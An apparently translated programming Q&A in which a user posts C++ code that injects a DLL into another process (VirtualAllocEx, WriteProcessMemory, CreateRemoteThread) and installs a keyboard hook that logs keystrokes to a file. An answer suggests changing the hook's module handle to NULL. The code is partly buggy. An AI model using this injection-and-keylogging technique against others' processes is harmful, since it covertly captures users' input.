我试图使用注入的dll从另一个进程获取键盘消息,但我不知道在我自己的程序中必须调用函数的位置。 这是我注入的dll函数:
//this is my dll main function
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
/* open file */
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
hInst = (HINSTANCE)hModule;
// should be function calling be here????
installhook();
break;
case DLL_PROCESS_DETACH:
fprintf(file, "DLL detach function called.\n");
break;
case DLL_THREAD_ATTACH:
fprintf(file, "DLL thread attach function called.\n");
break;
case DLL_THREAD_DETACH:
fprintf(file, "DLL thread detach function called.\n");
break;
}
hInst = (HINSTANCE)hModule;
/* close file */
fclose(file);
return TRUE;
}
这是我的安装钩子函数,用于安装keyboardproc进行处理
BOOL __declspec(dllexport)__stdcall installhook()
{
HWND targetWnd;
HANDLE hProcess;
unsigned long processID = 0;
hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId());
return TRUE;
}
这是我的keyboardproc函数体
LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
char ch;
MessageBoxA(nullptr, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING);
do
{
if (((DWORD)lParam & 0x40000000) && (HC_ACTION == nCode))
{
if ((wParam == VK_SPACE) || (wParam == VK_RETURN) || (wParam >= 0x2f) && (wParam <= 0x100))
{
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
fprintf(file, nCode + ".\n");
}
}
} while (0);
return CallNextHookEx(hkb, nCode, wParam, lParam);
}
最后这是我的主程序,我将dll注入目标进程
int procID = 9448;
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
if (process == NULL) {
printf("Error: the specified process couldn't be found.\n");
}
/*
* Get address of the LoadLibrary function.
*/
LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (addr == NULL) {
printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
}
/*
* Allocate new memory region inside the process's address space.
*/
LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (arg == NULL) {
printf("Error: the memory could not be allocated inside the chosen process.\n");
}
/*
* Write the argument to LoadLibraryA to the process's newly allocated memory region.
*/
int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
if (n == 0) {
printf("Error: there was no bytes written to the process's address space.\n");
}
cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:"<<n<<"\n";
/*
* Inject our DLL into the process's address space.
*/
HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
if (threadID == NULL) {
printf("Error: the remote thread could not be created.\n");
}
else {
printf("Success: the remote thread was successfully created.\n");
}
/*
* Close the handle to the process, becuase we've already injected the DLL.
*/
CloseHandle(process);
我的代码有什么问题,必须改变哪些才能获得所需的结果!
答案 0 :(得分:1)
是的,可以从DLL_PROCESS_ATTACH调用它。 但根据msdn
hMod [in]类型:HINSTANCE包含钩子的DLL的句柄 lpfn参数指向的过程。 hMod参数必须是 如果dwThreadId参数指定由其创建的线程,则设置为NULL 当前进程以及钩子过程是否在代码中 与当前流程相关联。
所以将hMod
更改为NULL
hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, NULL, GetCurrentThreadId());